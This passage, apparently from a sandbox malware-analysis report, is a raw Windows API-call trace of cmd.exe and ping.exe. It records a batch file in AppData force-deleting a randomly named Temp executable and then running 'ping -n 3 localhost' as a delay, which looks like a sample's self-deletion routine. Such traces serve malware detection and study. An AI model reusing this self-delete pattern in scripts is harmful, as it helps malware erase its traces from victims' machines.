(in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.832] _tell (_FileHandle=3) returned 145 [0120.832] _close (_FileHandle=3) returned 0 [0120.832] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef2a4 | out: _Buffer="\r\n") returned 2 [0120.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.832] GetFileType (hFile=0x7) returned 0x2 [0120.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.832] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef264 | out: lpMode=0x1ef264) returned 1 [0120.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.832] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef290, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef290*=0x2) 
returned 1 [0120.832] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.832] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef2a0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.833] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1ef2a0 | out: _Buffer=">") returned 1 [0120.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.833] GetFileType (hFile=0x7) returned 0x2 [0120.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.833] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef268 | out: lpMode=0x1ef268) returned 1 [0120.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.833] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1ef294, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1ef294*=0x19) returned 1 [0120.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.833] GetFileType (hFile=0x7) returned 0x2 [0120.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.833] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4ec | out: lpMode=0x1ef4ec) returned 1 [0120.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3af008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1ef518, lpReserved=0x0 | out: lpBuffer=0x3af008*, lpNumberOfCharsWritten=0x1ef518*=0x3) returned 1 [0120.834] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef524 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" ") returned 58 [0120.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.834] GetFileType (hFile=0x7) returned 0x2 [0120.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.834] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4e4 | out: lpMode=0x1ef4e4) returned 1 
[0120.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1ef510, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef510*=0x3a) returned 1 [0120.835] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef544 | out: _Buffer="\r\n") returned 2 [0120.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.835] GetFileType (hFile=0x7) returned 0x2 [0120.835] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef504 | out: lpMode=0x1ef504) returned 1 [0120.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.835] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef530, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef530*=0x2) returned 1 [0120.835] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.835] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.835] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.835] GetConsoleTitleW (in: lpConsoleTitle=0x1ef0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.836] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee130, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.836] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2="..") returned 58 [0120.836] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0xffffffff [0120.836] GetLastError () returned 0x2 [0120.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2="..") returned 58 [0120.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0xffffffff [0120.837] GetLastError () returned 0x2 [0120.837] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", fInfoLevelId=0x0, lpFindFileData=0x3b0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b0554) returned 0xffffffff [0120.837] GetLastError () returned 0x2 [0120.837] _get_osfhandle (_FileHandle=2) returned 0xb [0120.837] GetFileType (hFile=0xb) returned 0x2 [0120.837] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.837] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eeb2c | out: lpMode=0x1eeb2c) returned 1 [0120.837] _get_osfhandle (_FileHandle=2) returned 0xb [0120.837] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eeb60 | out: lpConsoleScreenBufferInfo=0x1eeb60) returned 1 [0120.837] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0120.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.838] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.838] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 
[0120.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.838] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.839] SetConsoleInputExeNameW () returned 0x1 [0120.839] GetConsoleOutputCP () returned 0x1b5 [0120.839] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.839] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.839] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.839] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.839] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.839] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.839] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x0, lpOverlapped=0x0) returned 1 [0120.840] GetLastError () returned 0x0 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] GetFileType (hFile=0x54) returned 0x1 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | 
out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4b4, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4b4*=0x0, lpOverlapped=0x0) returned 1 [0120.840] GetLastError () returned 0x0 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] GetFileType (hFile=0x54) returned 0x1 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] longjmp () [0120.840] _tell (_FileHandle=3) returned 145 [0120.840] _close (_FileHandle=3) returned 0 [0120.841] CmdBatNotification () returned 0x0 [0120.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.841] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.841] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.841] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.841] SetConsoleInputExeNameW () returned 0x1 [0120.841] GetConsoleOutputCP () returned 0x1b5 [0120.841] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.841] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.842] exit (_Code=0) Process: id = "55" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16680" os_pid = "0xe34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0xdc4" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" 
[0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8113 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8114 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8115 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8116 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 8117 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8118 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8119 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8120 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8121 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8122 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = 
"" Region: id = 8197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8199 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8200 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 8201 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 8202 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8203 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8204 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8205 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8206 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8207 start_va = 0x76480000 
end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8208 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8209 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8210 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8211 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8212 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8213 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8214 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8215 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") 
Region: id = 8216 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8236 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 8237 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8238 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8239 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 8240 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 8241 start_va = 0x70000 end_va = 0x72fff entry_point = 0x70000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 8242 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8243 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8244 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 8245 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 8257 start_va = 0x1140000 end_va = 0x140efff entry_point = 0x1140000 region_type = 
mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8258 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8259 start_va = 0x250000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8260 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 8261 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 8262 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8263 start_va = 0x1410000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 8284 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 8285 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 8286 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8287 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = 
"\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8328 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 8329 start_va = 0x1630000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 8442 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 8443 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 8519 start_va = 0x16e0000 end_va = 0x171ffff entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" filename = "" Region: id = 8520 start_va = 0x17f0000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 8521 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 87 os_tid = 0xe38 [0116.368] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfa24 | out: lpSystemTimeAsFileTime=0xcfa24*(dwLowDateTime=0x82aa7980, dwHighDateTime=0x1d440a9)) [0116.368] GetCurrentProcessId () returned 0xe34 [0116.368] GetCurrentThreadId () returned 0xe38 [0116.368] GetTickCount () returned 0x27992 [0116.368] QueryPerformanceCounter (in: lpPerformanceCount=0xcfa1c | out: lpPerformanceCount=0xcfa1c*=17315754111) returned 1 [0116.369] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0116.369] __set_app_type (_Type=0x1) [0116.369] __p__fmode () returned 0x76b331f4 [0116.369] __p__commode () returned 0x76b331fc [0116.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0116.369] __getmainargs (in: 
_Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0116.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.380] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.381] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0116.389] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xcf4b4 | out: phkResult=0xcf4b4*=0x58) returned 0x0 [0116.389] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xcf4a8, lpData=0xcf4b0, lpcbData=0xcf4ac*=0x4 | out: lpType=0xcf4a8*=0x0, lpData=0xcf4b0*=0x0, lpcbData=0xcf4ac*=0x4) returned 0x2 [0116.389] RegCloseKey (hKey=0x58) returned 0x0 [0116.389] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf47c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf4a4 | out: ppResult=0xcf4a4*=0x0) returned 11001 [0116.389] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf47c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf4a4 | out: ppResult=0xcf4a4*=0x3546f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x3547b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3547e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x353a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0116.730] FreeAddrInfoW (pAddrInfo=0x3546f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, 
ai_canonname="剣㉨坙㝵", ai_addr=0x3547b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3547e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x353a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0116.730] Icmp6CreateFile () returned 0x358b40 [0116.899] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x354830 [0116.899] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x35ebb0 [0116.899] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0116.900] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xcf4a4, nSize=0x0, Arguments=0xcf4a0 | out: lpBuffer="XH5") returned 0x19 [0116.900] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x354858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0116.900] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.900] _write (in: _FileHandle=1, _Buf=0x354858*, _MaxCharCount=0x19 | out: _Buf=0x354858*) returned 25 [0116.900] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.900] LocalFree (hMem=0x354858) returned 0x0 [0116.900] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer="XH5") returned 0x18 [0116.900] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x354858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0116.900] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.900] _write (in: _FileHandle=1, _Buf=0x354858*, _MaxCharCount=0x18 | out: 
